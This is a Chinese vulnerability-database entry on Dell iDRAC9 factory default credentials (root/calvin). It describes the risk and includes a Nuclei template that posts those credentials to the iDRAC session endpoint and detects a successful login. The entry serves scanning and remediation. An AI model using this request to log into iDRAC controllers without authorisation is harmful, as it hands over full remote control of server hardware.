漏洞信息
漏洞名称: DELL iDRAC9 默认登录凭证漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: DELL iDRAC9是戴尔公司推出的一款远程访问控制器,主要用于服务器的远程管理,包括监控系统健康、配置硬件设置和执行维护任务等。它广泛应用于企业级服务器管理中,是数据中心和IT基础设施的重要组成部分。该产品被发现存在默认登录凭证漏洞,攻击者可以利用这些默认凭证未经授权访问系统。
漏洞的根源在于DELL iDRAC9系统在出厂时预设了默认的用户名和密码(用户名:root,密码:calvin),而许多用户在部署后未能及时更改这些默认凭证。这种弱口令问题属于CWE-798类漏洞,即使用硬编码凭证。攻击者可以通过简单的暴力破解或直接尝试这些默认凭证,轻易获得系统的访问权限。
此漏洞的安全风险极高,因为一旦攻击者利用默认凭证登录系统,他们可以执行任意命令、访问敏感数据、修改系统配置,甚至完全控制受影响的服务器。由于iDRAC9通常用于管理关键服务器,这种未授权访问可能导致严重的数据泄露、服务中断或其他恶意活动。值得注意的是,利用此漏洞无需任何前置条件或认证,攻击者可以自动化地进行攻击尝试,使得漏洞的利用门槛极低,危害性极大。
产品厂商: DELL
产品名称: DELL iDRAC9
来源: https://github.com/projectdiscovery/nuclei-templates/blob/209157c2ffc6387f4b43acc176a988af5ec6a870/http%2Fdefault-logins%2Fdell%2Fdell-idrac9-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| id: dell-idrac9-default-login
info: name: DELL iDRAC9 - Default Login author: kophjager007,milo2012 severity: high description: DELL iDRAC9 default login credentials were discovered. reference: - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9 classification: cwe-id: cwe-798 metadata: max-request: 1 tags: dell,idrac,default-login
http: - raw: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} User: "{{username}}" Password: "{{password}}"
payloads: username: - root password: - calvin attack: pitchfork
matchers-condition: and matchers: - type: status status: - 201 - 200 condition: or
- type: regex name: authresult regex: - '"authResult"\s*:\s*0'
|